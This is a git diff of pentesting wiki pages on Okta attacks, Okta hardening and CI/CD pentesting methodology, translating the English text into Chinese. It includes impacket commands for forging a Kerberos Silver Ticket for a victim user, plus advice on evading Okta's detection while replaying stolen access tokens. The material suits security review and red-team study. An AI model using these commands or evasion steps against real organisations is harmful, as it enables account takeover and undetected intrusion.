acknowledged as a prominent entity in the Identity and Access Management (IAM) arena. +这些服务共同旨在加强数据保护并简化用户访问,提高安全性和便利性。Okta 解决方案的多样性使其成为各个行业的热门选择,适合大型企业、小公司和个人开发者。截至 2021 年 9 月的最后更新,Okta 被认为是身份和访问管理 (IAM) 领域的一个重要实体。 > [!CAUTION] -> The main gola of Okta is to configure access to different users and groups to external applications. If you manage to **compromise administrator privileges in an Oktas** environment, you will highly probably able to **compromise all the other platforms the company is using**. +> Okta 的主要目标是为不同用户和组配置对外部应用程序的访问。如果您设法在 Okta 环境中 **破坏管理员权限**,您很可能能够 **破坏公司使用的所有其他平台**。 > [!TIP] -> To perform a security review of an Okta environment you should ask for **administrator read-only access**. 
+> 要对 Okta 环境进行安全审查,您应该请求 **管理员只读访问**。 -### Summary +### 摘要 -There are **users** (which can be **stored in Okta,** logged from configured **Identity Providers** or authenticated via **Active Directory** or LDAP).\ -These users can be inside **groups**.\ -There are also **authenticators**: different options to authenticate like password, and several 2FA like WebAuthn, email, phone, okta verify (they could be enabled or disabled)... +有 **用户**(可以是 **存储在 Okta 中,** 从配置的 **身份提供者** 登录或通过 **Active Directory** 或 LDAP 进行身份验证)。\ +这些用户可以在 **组** 内。\ +还有 **身份验证器**:不同的身份验证选项,如密码和多种 2FA,如 WebAuthn、电子邮件、电话、Okta Verify(它们可以启用或禁用)... -Then, there are **applications** synchronized with Okta. Each applications will have some **mapping with Okta** to share information (such as email addresses, first names...). Moreover, each application must be inside an **Authentication Policy**, which indicates the **needed authenticators** for a user to **access** the application. +然后,有与 Okta 同步的 **应用程序**。每个应用程序将与 Okta 有一些 **映射** 以共享信息(如电子邮件地址、名字等)。此外,每个应用程序必须在 **身份验证策略** 中,指明用户 **访问** 应用程序所需的 **身份验证器**。 > [!CAUTION] -> The most powerful role is **Super Administrator**. +> 最强大的角色是 **超级管理员**。 > -> If an attacker compromise Okta with Administrator access, all the **apps trusting Okta** will be highly probably **compromised**. +> 如果攻击者以管理员身份破坏 Okta,所有 **信任 Okta 的应用程序** 很可能会 **被破坏**。 -## Attacks +## 攻击 -### Locating Okta Portal +### 定位 Okta 门户 -Usually the portal of a company will be located in **companyname.okta.com**. If not, try simple **variations** of **companyname.** If you cannot find it, it's also possible that the organization has a **CNAME** record like **`okta.companyname.com`** pointing to the **Okta portal**. +通常公司的门户将位于 **companyname.okta.com**。如果没有,请尝试简单的 **companyname.** 的 **变体**。如果找不到,也可能该组织有一个指向 **Okta 门户** 的 **CNAME** 记录,如 **`okta.companyname.com`**。 -### Login in Okta via Kerberos +### 通过 Kerberos 登录 Okta -If **`companyname.kerberos.okta.com`** is active, **Kerberos is used for Okta access**, typically bypassing **MFA** for **Windows** users. To find Kerberos-authenticated Okta users in AD, run **`getST.py`** with **appropriate parameters**. Upon obtaining an **AD user ticket**, **inject** it into a controlled host using tools like Rubeus or Mimikatz, ensuring **`clientname.kerberos.okta.com` is in the Internet Options "Intranet" zone**. Accessing a specific URL should return a JSON "OK" response, indicating Kerberos ticket acceptance, and granting access to the Okta dashboard. +如果 **`companyname.kerberos.okta.com`** 活跃,**Kerberos 用于 Okta 访问**,通常会绕过 **MFA** 以供 **Windows** 用户使用。要在 AD 中查找 Kerberos 认证的 Okta 用户,请使用 **适当的参数** 运行 **`getST.py`**。在获得 **AD 用户票证** 后,使用 Rubeus 或 Mimikatz 等工具将其 **注入** 到受控主机中,确保 **`clientname.kerberos.okta.com` 在 Internet 选项的 "内部网" 区域**。访问特定 URL 应返回 JSON "OK" 响应,表示 Kerberos 票证被接受,并授予访问 Okta 仪表板的权限。 -Compromising the **Okta service account with the delegation SPN enables a Silver Ticket attack.** However, Okta's use of **AES** for ticket encryption requires possessing the AES key or plaintext password. Use **`ticketer.py` to generate a ticket for the victim user** and deliver it via the browser to authenticate with Okta. 
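For reference, a hedged sketch of the impacket usage mentioned above; the SPN, domain, account names and key are placeholders, and the exact SPN/delegation setup varies per tenant:
```bash
# Request a service ticket for the Okta Kerberos endpoint as a regular AD user (example names)
getST.py -spn HTTP/companyname.kerberos.okta.com -dc-ip 10.0.0.10 'CORP.LOCAL/jdoe:Password123'

# With the Okta service account's AES key, forge a Silver Ticket for an arbitrary victim user
ticketer.py -aesKey <aes256_key> -domain-sid S-1-5-21-... -domain corp.local \
  -spn HTTP/companyname.kerberos.okta.com victimuser
export KRB5CCNAME=victimuser.ccache
```
The forged ticket is then delivered through the browser (or injected on a controlled Windows host with Rubeus/Mimikatz) to authenticate against the Okta portal, as described above.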
+破坏 **Okta 服务帐户与委派 SPN 使得银票攻击成为可能**。然而,Okta 使用 **AES** 进行票证加密,需要拥有 AES 密钥或明文密码。使用 **`ticketer.py` 为受害者用户生成票证**,并通过浏览器传递以进行 Okta 身份验证。 -**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** +**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。** -### Hijacking Okta AD Agent +### 劫持 Okta AD 代理 -This technique involves **accessing the Okta AD Agent on a server**, which **syncs users and handles authentication**. By examining and decrypting configurations in **`OktaAgentService.exe.config`**, notably the AgentToken using **DPAPI**, an attacker can potentially **intercept and manipulate authentication data**. This allows not only **monitoring** and **capturing user credentials** in plaintext during the Okta authentication process but also **responding to authentication attempts**, thereby enabling unauthorized access or providing universal authentication through Okta (akin to a 'skeleton key'). +该技术涉及 **访问服务器上的 Okta AD 代理**,该代理 **同步用户并处理身份验证**。通过检查和解密 **`OktaAgentService.exe.config`** 中的配置,特别是使用 **DPAPI** 的 AgentToken,攻击者可以潜在地 **拦截和操纵身份验证数据**。这不仅允许 **监控** 和 **捕获用户凭据** 在 Okta 身份验证过程中的明文,还可以 **响应身份验证尝试**,从而实现未经授权的访问或通过 Okta 提供通用身份验证(类似于“万能钥匙”)。 -**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** +**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。** -### Hijacking AD As an Admin +### 作为管理员劫持 AD -This technique involves hijacking an Okta AD Agent by first obtaining an OAuth Code, then requesting an API token. The token is associated with an AD domain, and a **connector is named to establish a fake AD agent**. Initialization allows the agent to **process authentication attempts**, capturing credentials via the Okta API. Automation tools are available to streamline this process, offering a seamless method to intercept and handle authentication data within the Okta environment. +该技术涉及通过首先获取 OAuth 代码来劫持 Okta AD 代理,然后请求 API 令牌。该令牌与 AD 域相关联,并且 **连接器被命名以建立一个假 AD 代理**。初始化允许代理 **处理身份验证尝试**,通过 Okta API 捕获凭据。可用的自动化工具可以简化此过程,提供在 Okta 环境中拦截和处理身份验证数据的无缝方法。 -**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** +**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。** -### Okta Fake SAML Provider +### Okta 假 SAML 提供者 -**Check the attack in** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**.** +**检查攻击在** [**https://trustedsec.com/blog/okta-for-red-teamers**](https://trustedsec.com/blog/okta-for-red-teamers)**。** -The technique involves **deploying a fake SAML provider**. By integrating an external Identity Provider (IdP) within Okta's framework using a privileged account, attackers can **control the IdP, approving any authentication request at will**. The process entails setting up a SAML 2.0 IdP in Okta, manipulating the IdP Single Sign-On URL for redirection via local hosts file, generating a self-signed certificate, and configuring Okta settings to match against the username or email. Successfully executing these steps allows for authentication as any Okta user, bypassing the need for individual user credentials, significantly elevating access control in a potentially unnoticed manner. 
+该技术涉及 **部署一个假 SAML 提供者**。通过使用特权帐户在 Okta 框架中集成外部身份提供者 (IdP),攻击者可以 **控制 IdP,随意批准任何身份验证请求**。该过程包括在 Okta 中设置 SAML 2.0 IdP,操纵 IdP 单点登录 URL 通过本地 hosts 文件进行重定向,生成自签名证书,并配置 Okta 设置以匹配用户名或电子邮件。成功执行这些步骤允许以任何 Okta 用户的身份进行身份验证,绕过对单个用户凭据的需求,显著提高访问控制,可能不会被注意。 -### Phishing Okta Portal with Evilgnix +### 使用 Evilgnix 针对 Okta 门户的钓鱼 -In [**this blog post**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) is explained how to prepare a phishing campaign against an Okta portal. +在 [**这篇博客文章**](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) 中解释了如何准备针对 Okta 门户的钓鱼活动。 -### Colleague Impersonation Attack +### 同事冒充攻击 -The **attributes that each user can have and modify** (like email or first name) can be configured in Okta. If an **application** is **trusting** as ID an **attribute** that the user can **modify**, he will be able to **impersonate other users in that platform**. +每个用户可以拥有和修改的 **属性**(如电子邮件或名字)可以在 Okta 中配置。如果一个 **应用程序** 将用户可以 **修改** 的 **属性** 作为 ID 进行 **信任**,他将能够 **在该平台上冒充其他用户**。 -Therefore, if the app is trusting the field **`userName`**, you probably won't be able to change it (because you usually cannot change that field), but if it's trusting for example **`primaryEmail`** you might be able to **change it to a colleagues email address** and impersonate it (you will need to have access to the email and accept the change). +因此,如果该应用程序信任字段 **`userName`**,您可能无法更改它(因为通常无法更改该字段),但如果它信任例如 **`primaryEmail`**,您可能能够 **将其更改为同事的电子邮件地址** 并冒充它(您需要访问该电子邮件并接受更改)。 -Note that this impersoantion depends on how each application was condigured. Only the ones trusting the field you modified and accepting updates will be compromised.\ -Therefore, the app should have this field enabled if it exists: +请注意,这种冒充取决于每个应用程序的配置。只有信任您修改的字段并接受更新的应用程序将受到影响。\ +因此,如果存在,该应用程序应启用此字段:
-I have also seen other apps that were vulnerable but didn't have that field in the Okta settings (at the end different apps are configured differently). +我还见过其他易受攻击的应用程序,但在 Okta 设置中没有该字段(最终不同的应用程序配置不同)。 -The best way to find out if you could impersonate anyone on each app would be to try it! +找出您是否可以在每个应用程序上冒充任何人的最佳方法是尝试一下! -## Evading behavioural detection policies +## 规避行为检测策略 -Behavioral detection policies in Okta might be unknown until encountered, but **bypassing** them can be achieved by **targeting Okta applications directly**, avoiding the main Okta dashboard. With an **Okta access token**, replay the token at the **application-specific Okta URL** instead of the main login page. +Okta 中的行为检测策略可能在遇到之前未知,但 **绕过** 它们可以通过 **直接针对 Okta 应用程序** 来实现,避免主要的 Okta 仪表板。使用 **Okta 访问令牌**,在 **特定应用程序的 Okta URL** 上重放令牌,而不是主登录页面。 -Key recommendations include: +关键建议包括: -- **Avoid using** popular anonymizer proxies and VPN services when replaying captured access tokens. -- Ensure **consistent user-agent strings** between the client and replayed access tokens. -- **Refrain from replaying** tokens from different users from the same IP address. -- Exercise caution when replaying tokens against the Okta dashboard. -- If aware of the victim company's IP addresses, **restrict traffic** to those IPs or their range, blocking all other traffic. +- **避免使用** 流行的匿名代理和 VPN 服务来重放捕获的访问令牌。 +- 确保 **客户端和重放访问令牌之间的一致用户代理字符串**。 +- **避免从同一 IP 地址重放** 来自不同用户的令牌。 +- 在重放令牌时对 Okta 仪表板要小心。 +- 如果知道受害公司 IP 地址,**限制流量** 到这些 IP 或其范围,阻止所有其他流量。 -## Okta Hardening +## Okta 加固 -Okta has a lot of possible configurations, in this page you will find how to review them so they are as secure as possible: +Okta 有很多可能的配置,在此页面中您将找到如何审查它们以确保尽可能安全: {{#ref}} okta-hardening.md {{#endref}} -## References +## 参考 - [https://trustedsec.com/blog/okta-for-red-teamers](https://trustedsec.com/blog/okta-for-red-teamers) - [https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23](https://medium.com/nickvangilder/okta-for-red-teamers-perimeter-edition-c60cb8d53f23) {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/okta-security/okta-hardening.md b/src/pentesting-ci-cd/okta-security/okta-hardening.md index a7dac96a7..3bf460d60 100644 --- a/src/pentesting-ci-cd/okta-security/okta-hardening.md +++ b/src/pentesting-ci-cd/okta-security/okta-hardening.md @@ -2,202 +2,198 @@ {{#include ../../banners/hacktricks-training.md}} -## Directory +## 目录 -### People +### 人员 -From an attackers perspective, this is super interesting as you will be able to see **all the users registered**, their **email** addresses, the **groups** they are part of, **profiles** and even **devices** (mobiles along with their OSs). +从攻击者的角度来看,这非常有趣,因为您将能够看到**所有注册的用户**、他们的**电子邮件**地址、他们所属的**组**、**个人资料**,甚至**设备**(手机及其操作系统)。 -For a whitebox review check that there aren't several "**Pending user action**" and "**Password reset**". +对于白盒审查,请检查是否没有多个“**待处理用户操作**”和“**密码重置**”。 -### Groups +### 组 -This is where you find all the created groups in Okta. it's interesting to understand the different groups (set of **permissions**) that could be granted to **users**.\ -It's possible to see the **people included inside groups** and **apps assigned** to each group. +这是您可以找到在 Okta 中创建的所有组的地方。了解不同的组(**权限**集合)可能授予**用户**的权限是很有趣的。\ +可以查看**包含在组中的人员**和**分配给每个组的应用程序**。 -Ofc, any group with the name of **admin** is interesting, specially the group **Global Administrators,** check the members to learn who are the most privileged members. 
+当然,任何名为**admin**的组都很有趣,特别是**全球管理员**组,检查成员以了解谁是特权成员。 -From a whitebox review, there **shouldn't be more than 5 global admins** (better if there are only 2 or 3). +从白盒审查来看,**全球管理员不应超过 5 个**(最好只有 2 或 3 个)。 -### Devices +### 设备 -Find here a **list of all the devices** of all the users. You can also see if it's being **actively managed** or not. +在这里找到**所有用户的设备列表**。您还可以查看它是否被**主动管理**。 -### Profile Editor +### 个人资料编辑器 -Here is possible to observe how key information such as first names, last names, emails, usernames... are shared between Okta and other applications. This is interesting because if a user can **modify in Okta a field** (such as his name or email) that then is used by an **external application** to **identify** the user, an insider could try to **take over other accounts**. +在这里可以观察到关键的个人信息,如名字、姓氏、电子邮件、用户名等是如何在 Okta 和其他应用程序之间共享的。这很有趣,因为如果用户可以在 Okta 中**修改某个字段**(例如他的名字或电子邮件),而该字段又被**外部应用程序**用来**识别**用户,那么内部人员可能会尝试**接管其他账户**。 -Moreover, in the profile **`User (default)`** from Okta you can see **which fields** each **user** has and which ones are **writable** by users. If you cannot see the admin panel, just go to **update your profile** information and you will see which fields you can update (note that to update an email address you will need to verify it). +此外,在 Okta 的个人资料**`用户(默认)`**中,您可以看到**每个用户**具有的**字段**以及哪些字段是**可写**的。如果您无法看到管理面板,只需转到**更新您的个人资料**信息,您将看到可以更新的字段(请注意,要更新电子邮件地址,您需要验证它)。 -### Directory Integrations +### 目录集成 -Directories allow you to import people from existing sources. I guess here you will see the users imported from other directories. +目录允许您从现有来源导入人员。我想在这里您将看到从其他目录导入的用户。 -I haven't seen it, but I guess this is interesting to find out **other directories that Okta is using to import users** so if you **compromise that directory** you could set some attributes values in the users created in Okta and **maybe compromise the Okta env**. +我没有看到它,但我想这很有趣,可以找出**Okta 用于导入用户的其他目录**,因此如果您**妥协该目录**,您可以在 Okta 中创建的用户中设置一些属性值,并**可能妥协 Okta 环境**。 -### Profile Sources +### 个人资料来源 -A profile source is an **application that acts as a source of truth** for user profile attributes. A user can only be sourced by a single application or directory at a time. +个人资料来源是**作为用户个人资料属性的真实来源的应用程序**。用户一次只能由一个应用程序或目录提供。 -I haven't seen it, so any information about security and hacking regarding this option is appreciated. +我没有看到它,因此关于此选项的安全性和黑客攻击的任何信息都很受欢迎。 -## Customizations +## 自定义 -### Brands +### 品牌 -Check in the **Domains** tab of this section the email addresses used to send emails and the custom domain inside Okta of the company (which you probably already know). +在此部分的**域**选项卡中检查用于发送电子邮件的电子邮件地址和公司在 Okta 中的自定义域(您可能已经知道)。 -Moreover, in the **Setting** tab, if you are admin, you can "**Use a custom sign-out page**" and set a custom URL. +此外,在**设置**选项卡中,如果您是管理员,您可以“**使用自定义注销页面**”并设置自定义 URL。 -### SMS +### 短信 -Nothing interesting here. +这里没有什么有趣的内容。 -### End-User Dashboard +### 最终用户仪表板 -You can find here applications configured, but we will see the details of those later in a different section. +您可以在这里找到配置的应用程序,但我们将在不同的部分稍后查看这些详细信息。 -### Other +### 其他 -Interesting setting, but nothing super interesting from a security point of view. +有趣的设置,但从安全的角度来看没有什么特别有趣的内容。 -## Applications +## 应用程序 -### Applications +### 应用程序 -Here you can find all the **configured applications** and their details: Who has access to them, how is it configured (SAML, OPenID), URL to login, the mappings between Okta and the application... +在这里,您可以找到所有**配置的应用程序**及其详细信息:谁可以访问它们,如何配置(SAML、OpenID)、登录 URL、Okta 和应用程序之间的映射... 
-In the **`Sign On`** tab there is also a field called **`Password reveal`** that would allow a user to **reveal his password** when checking the application settings. To check the settings of an application from the User Panel, click the 3 dots: +在**`登录`**选项卡中,还有一个名为**`密码显示`**的字段,允许用户在检查应用程序设置时**显示他的密码**。要从用户面板检查应用程序的设置,请单击 3 个点:
-And you could see some more details about the app (like the password reveal feature, if it's enabled): +您可以看到有关该应用程序的更多详细信息(例如密码显示功能是否启用):
-## Identity Governance +## 身份治理 -### Access Certifications +### 访问认证 -Use Access Certifications to create audit campaigns to review your users' access to resources periodically and approve or revoke access automatically when required. +使用访问认证创建审计活动,以定期审查用户对资源的访问,并在需要时自动批准或撤销访问。 -I haven't seen it used, but I guess that from a defensive point of view it's a nice feature. +我没有看到它被使用,但我想从防御的角度来看,这是一个不错的功能。 -## Security +## 安全 -### General +### 一般 -- **Security notification emails**: All should be enabled. -- **CAPTCHA integration**: It's recommended to set at least the invisible reCaptcha -- **Organization Security**: Everything can be enabled and activation emails shouldn't last long (7 days is ok) -- **User enumeration prevention**: Both should be enabled - - Note that User Enumeration Prevention doesn't take effect if either of the following conditions are allowed (See [User management](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm) for more information): - - Self-Service Registration - - JIT flows with email authentication -- **Okta ThreatInsight settings**: Log and enforce security based on threat level +- **安全通知电子邮件**:所有应启用。 +- **CAPTCHA 集成**:建议至少设置不可见的 reCaptcha。 +- **组织安全**:所有内容都可以启用,激活电子邮件不应持续太长时间(7 天是可以的)。 +- **用户枚举防止**:两者都应启用。 +- 请注意,如果允许以下任一条件,则用户枚举防止将无效(有关更多信息,请参见 [用户管理](https://help.okta.com/oie/en-us/Content/Topics/users-groups-profiles/usgp-main.htm)): +- 自助注册 +- 带电子邮件身份验证的 JIT 流程 +- **Okta ThreatInsight 设置**:根据威胁级别记录和执行安全性。 ### HealthInsight -Here is possible to find correctly and **dangerous** configured **settings**. +在这里可以找到正确和**危险**配置的**设置**。 -### Authenticators +### 认证器 -Here you can find all the authentication methods that a user could use: Password, phone, email, code, WebAuthn... Clicking in the Password authenticator you can see the **password policy**. Check that it's strong. +在这里,您可以找到用户可以使用的所有身份验证方法:密码、电话、电子邮件、代码、WebAuthn... 单击密码认证器,您可以查看**密码策略**。请检查它是否强大。 -In the **Enrollment** tab you can see how the ones that are required or optinal: +在**注册**选项卡中,您可以看到哪些是必需的或可选的:
-It's recommendatble to disable Phone. The strongest ones are probably a combination of password, email and WebAuthn. +建议禁用电话。最强的组合可能是密码、电子邮件和 WebAuthn 的组合。 -### Authentication policies +### 身份验证策略 -Every app has an authentication policy. The authentication policy verifies that users who try to sign in to the app meet specific conditions, and it enforces factor requirements based on those conditions. +每个应用程序都有一个身份验证策略。身份验证策略验证尝试登录应用程序的用户是否满足特定条件,并根据这些条件强制执行因素要求。 -Here you can find the **requirements to access each application**. It's recommended to request at least password and another method for each application. But if as attacker you find something more weak you might be able to attack it. +在这里,您可以找到**访问每个应用程序的要求**。建议每个应用程序至少请求密码和另一种方法。但是,如果作为攻击者您发现某些东西更弱,您可能能够攻击它。 -### Global Session Policy +### 全局会话策略 -Here you can find the session policies assigned to different groups. For example: +在这里,您可以找到分配给不同组的会话策略。例如:
-It's recommended to request MFA, limit the session lifetime to some hours, don't persis session cookies across browser extensions and limit the location and Identity Provider (if this is possible). For example, if every user should be login from a country you could only allow this location. +建议请求 MFA,将会话生命周期限制为几个小时,不要在浏览器扩展中持久化会话 cookie,并限制位置和身份提供者(如果可能的话)。例如,如果每个用户应该从一个国家登录,您可以只允许该位置。 -### Identity Providers +### 身份提供者 -Identity Providers (IdPs) are services that **manage user accounts**. Adding IdPs in Okta enables your end users to **self-register** with your custom applications by first authenticating with a social account or a smart card. +身份提供者(IdP)是**管理用户账户**的服务。在 Okta 中添加 IdP 使您的最终用户能够通过首先使用社交账户或智能卡进行身份验证来**自助注册**您的自定义应用程序。 -On the Identity Providers page, you can add social logins (IdPs) and configure Okta as a service provider (SP) by adding inbound SAML. After you've added IdPs, you can set up routing rules to direct users to an IdP based on context, such as the user's location, device, or email domain. +在身份提供者页面上,您可以添加社交登录(IdP)并通过添加入站 SAML 将 Okta 配置为服务提供者(SP)。添加 IdP 后,您可以设置路由规则,根据上下文(例如用户的位置、设备或电子邮件域)将用户定向到 IdP。 -**If any identity provider is configured** from an attackers and defender point of view check that configuration and **if the source is really trustable** as an attacker compromising it could also get access to the Okta environment. +**如果配置了任何身份提供者**,从攻击者和防御者的角度检查该配置,并**确保来源确实可信**,因为攻击者妥协它也可能获得对 Okta 环境的访问。 -### Delegated Authentication +### 委派身份验证 -Delegated authentication allows users to sign in to Okta by entering credentials for their organization's **Active Directory (AD) or LDAP** server. +委派身份验证允许用户通过输入其组织的**Active Directory (AD) 或 LDAP** 服务器的凭据登录 Okta。 -Again, recheck this, as an attacker compromising an organizations AD could be able to pivot to Okta thanks to this setting. +再次检查这一点,因为攻击者妥协组织的 AD 可能能够通过此设置转向 Okta。 -### Network +### 网络 -A network zone is a configurable boundary that you can use to **grant or restrict access to computers and devices** in your organization based on the **IP address** that is requesting access. You can define a network zone by specifying one or more individual IP addresses, ranges of IP addresses, or geographic locations. +网络区域是一个可配置的边界,您可以使用它来**授予或限制对您组织中计算机和设备的访问**,基于请求访问的**IP 地址**。您可以通过指定一个或多个单独的 IP 地址、IP 地址范围或地理位置来定义网络区域。 -After you define one or more network zones, you can **use them in Global Session Policies**, **authentication policies**, VPN notifications, and **routing rules**. +定义一个或多个网络区域后,您可以在全局会话策略、身份验证策略、VPN 通知和路由规则中**使用它们**。 -From an attackers perspective it's interesting to know which Ps are allowed (and check if any **IPs are more privileged** than others). From an attackers perspective, if the users should be accessing from an specific IP address or region check that this feature is used properly. +从攻击者的角度来看,了解允许哪些 IP 是有趣的(并检查是否有任何**IP 比其他 IP 更特权**)。从攻击者的角度来看,如果用户应该从特定的 IP 地址或区域访问,请检查此功能是否正确使用。 -### Device Integrations +### 设备集成 -- **Endpoint Management**: Endpoint management is a condition that can be applied in an authentication policy to ensure that managed devices have access to an application. - - I haven't seen this used yet. TODO -- **Notification services**: I haven't seen this used yet. TODO +- **端点管理**:端点管理是可以应用于身份验证策略的条件,以确保受管理的设备可以访问应用程序。 +- 我还没有看到这被使用。待办事项 +- **通知服务**:我还没有看到这被使用。待办事项 ### API -You can create Okta API tokens in this page, and see the ones that have been **created**, theirs **privileges**, **expiration** time and **Origin URLs**. 
Note that an API tokens are generated with the permissions of the user that created the token and are valid only if the **user** who created them is **active**. +您可以在此页面创建 Okta API 令牌,并查看已**创建**的令牌、它们的**权限**、**过期**时间和**来源 URL**。请注意,API 令牌是使用创建令牌的用户的权限生成的,仅在创建它们的**用户**处于**活动**状态时有效。 -The **Trusted Origins** grant access to websites that you control and trust to access your Okta org through the Okta API. +**受信任的来源**授予您控制和信任的网站访问您的 Okta 组织,通过 Okta API。 -There shuoldn't be a lot of API tokens, as if there are an attacker could try to access them and use them. +不应有很多 API 令牌,因为如果有,攻击者可能会尝试访问它们并使用它们。 -## Workflow +## 工作流 -### Automations +### 自动化 -Automations allow you to create automated actions that run based on a set of trigger conditions that occur during the lifecycle of end users. +自动化允许您创建基于在最终用户生命周期中发生的一组触发条件运行的自动化操作。 -For example a condition could be "User inactivity in Okta" or "User password expiration in Okta" and the action could be "Send email to the user" or "Change user lifecycle state in Okta". +例如,一个条件可以是“Okta 中的用户不活动”或“Okta 中的用户密码过期”,而操作可以是“向用户发送电子邮件”或“在 Okta 中更改用户生命周期状态”。 -## Reports +## 报告 -### Reports +### 报告 -Download logs. They are **sent** to the **email address** of the current account. +下载日志。它们被**发送**到当前账户的**电子邮件地址**。 -### System Log +### 系统日志 -Here you can find the **logs of the actions performed by users** with a lot of details like login in Okta or in applications through Okta. +在这里,您可以找到**用户执行的操作日志**,包含许多详细信息,如在 Okta 或通过 Okta 登录应用程序。 -### Import Monitoring +### 导入监控 -This can **import logs from the other platforms** accessed with Okta. +这可以**从其他平台导入日志**,通过 Okta 访问。 -### Rate limits +### 速率限制 -Check the API rate limits reached. +检查达到的 API 速率限制。 -## Settings +## 设置 -### Account +### 账户 -Here you can find **generic information** about the Okta environment, such as the company name, address, **email billing contact**, **email technical contact** and also who should receive Okta updates and which kind of Okta updates. +在这里,您可以找到有关 Okta 环境的**通用信息**,例如公司名称、地址、**电子邮件账单联系人**、**电子邮件技术联系人**,以及谁应该接收 Okta 更新和哪种类型的 Okta 更新。 -### Downloads +### 下载 -Here you can download Okta agents to sync Okta with other technologies. +在这里,您可以下载 Okta 代理,以将 Okta 与其他技术同步。 {{#include ../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md index 41899af04..5a8daf2cc 100644 --- a/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md +++ b/src/pentesting-ci-cd/pentesting-ci-cd-methodology.md @@ -6,103 +6,99 @@ ## VCS -VCS stands for **Version Control System**, this systems allows developers to **manage their source code**. The most common one is **git** and you will usually find companies using it in one of the following **platforms**: +VCS 代表 **版本控制系统**,该系统允许开发人员 **管理他们的源代码**。最常见的是 **git**,您通常会发现公司在以下 **平台** 中使用它: - Github - Gitlab - Bitbucket - Gitea -- Cloud providers (they offer their own VCS platforms) +- 云提供商(他们提供自己的 VCS 平台) ## CI/CD Pipelines -CI/CD pipelines enable developers to **automate the execution of code** for various purposes, including building, testing, and deploying applications. These automated workflows are **triggered by specific actions**, such as code pushes, pull requests, or scheduled tasks. They are useful for streamlining the process from development to production. 
+CI/CD 管道使开发人员能够 **自动执行代码**,用于构建、测试和部署应用程序等各种目的。这些自动化工作流是通过 **特定操作** 触发的,例如代码推送、拉取请求或计划任务。它们有助于简化从开发到生产的过程。 -However, these systems need to be **executed somewhere** and usually with **privileged credentials to deploy code or access sensitive information**. +然而,这些系统需要在某个地方 **执行**,通常需要 **特权凭据来部署代码或访问敏感信息**。 ## VCS Pentesting Methodology > [!NOTE] -> Even if some VCS platforms allow to create pipelines for this section we are going to analyze only potential attacks to the control of the source code. +> 即使某些 VCS 平台允许创建管道,在本节中我们将仅分析对源代码控制的潜在攻击。 -Platforms that contains the source code of your project contains sensitive information and people need to be very careful with the permissions granted inside this platform. These are some common problems across VCS platforms that attacker could abuse: +包含您项目源代码的平台包含敏感信息,用户需要非常小心在此平台内授予的权限。这些是 VCS 平台上攻击者可能滥用的一些常见问题: -- **Leaks**: If your code contains leaks in the commits and the attacker can access the repo (because it's public or because he has access), he could discover the leaks. -- **Access**: If an attacker can **access to an account inside the VCS platform** he could gain **more visibility and permissions**. - - **Register**: Some platforms will just allow external users to create an account. - - **SSO**: Some platforms won't allow users to register, but will allow anyone to access with a valid SSO (so an attacker could use his github account to enter for example). - - **Credentials**: Username+Pwd, personal tokens, ssh keys, Oauth tokens, cookies... there are several kind of tokens a user could steal to access in some way a repo. -- **Webhooks**: VCS platforms allow to generate webhooks. If they are **not protected** with non visible secrets an **attacker could abuse them**. - - If no secret is in place, the attacker could abuse the webhook of the third party platform - - If the secret is in the URL, the same happens and the attacker also have the secret -- **Code compromise:** If a malicious actor has some kind of **write** access over the repos, he could try to **inject malicious code**. In order to be successful he might need to **bypass branch protections**. These actions can be performed with different goals in mid: - - Compromise the main branch to **compromise production**. - - Compromise the main (or other branches) to **compromise developers machines** (as they usually execute test, terraform or other things inside the repo in their machines). - - **Compromise the pipeline** (check next section) +- **泄漏**:如果您的代码在提交中包含泄漏,并且攻击者可以访问该仓库(因为它是公开的或因为他有访问权限),他可能会发现这些泄漏。 +- **访问**:如果攻击者可以 **访问 VCS 平台内的帐户**,他可能会获得 **更多的可见性和权限**。 +- **注册**:某些平台只允许外部用户创建帐户。 +- **SSO**:某些平台不允许用户注册,但允许任何人使用有效的 SSO 访问(例如,攻击者可以使用他的 github 帐户进入)。 +- **凭据**:用户名+密码、个人令牌、ssh 密钥、Oauth 令牌、cookies……用户可以窃取多种类型的令牌以某种方式访问仓库。 +- **Webhooks**:VCS 平台允许生成 webhooks。如果它们没有用不可见的秘密 **保护**,则 **攻击者可能会滥用它们**。 +- 如果没有秘密,攻击者可能会滥用第三方平台的 webhook +- 如果秘密在 URL 中,情况也是如此,攻击者也会拥有秘密 +- **代码妥协**:如果恶意行为者对仓库有某种 **写入** 访问权限,他可能会尝试 **注入恶意代码**。为了成功,他可能需要 **绕过分支保护**。这些操作可以以不同的目标进行: +- 妥协主分支以 **妥协生产**。 +- 妥协主分支(或其他分支)以 **妥协开发者机器**(因为他们通常在自己的机器上执行测试、terraform 或其他操作)。 +- **妥协管道**(查看下一节) ## Pipelines Pentesting Methodology -The most common way to define a pipeline, is by using a **CI configuration file hosted in the repository** the pipeline builds. 
